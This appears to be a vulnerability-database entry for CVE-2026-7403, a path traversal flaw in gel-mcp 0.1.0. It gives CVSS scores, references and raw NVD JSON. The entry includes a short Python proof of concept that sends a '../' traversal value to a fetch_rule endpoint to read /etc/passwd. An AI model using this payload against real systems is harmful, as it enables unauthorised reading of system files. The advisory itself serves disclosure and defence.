CVE-2026-7403

Description

A security flaw has been discovered in geldata gel-mcp 0.1.0. This impacts the function list_rules/fetch_rule of the file src/gel_mcp/server.py. The manipulation of the argument rule_name results in path traversal. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

geldata gel-mcp 0.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_url):
    # Vulnerable parameter
    payload = {
        "rule_name": "../../../../../../etc/passwd" 
    }
    
    try:
        # Sending malicious request to the vulnerable endpoint
        # Adjust the endpoint path based on actual implementation
        response = requests.post(f"{target_url}/fetch_rule", data=payload)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response content:")
            print(response.text)
            # Check for common indicators of successful file read
            if "root:" in response.text or "[extensions]" in response.text:
                print("[!] Potential Path Traversal confirmed.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target address
    target = "http://127.0.0.1:8000"
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7403
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7403
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7403/
[4] VulDB https://vuldb.com/cve/CVE-2026-7403
[5] https://github.com/geldata/gel-mcp/
[6] https://github.com/geldata/gel-mcp/issues/11
[7] https://vuldb.com/submit/803530
[8] https://vuldb.com/vuln/360139
[9] https://vuldb.com/vuln/360139/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7403", "sourceIdentifier": "[email protected]", "published": "2026-04-29T21:16:22.153", "lastModified": "2026-04-29T21:16:40.893", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in geldata gel-mcp 0.1.0. This impacts the function list_rules/fetch_rule of the file src/gel_mcp/server.py. The manipulation of the argument rule_name results in path traversal. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/geldata/gel-mcp/", "source": "[email protected]"}, {"url": "https://github.com/geldata/gel-mcp/issues/11", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/803530", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360139", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360139/cti", "source": "[email protected]"}]}}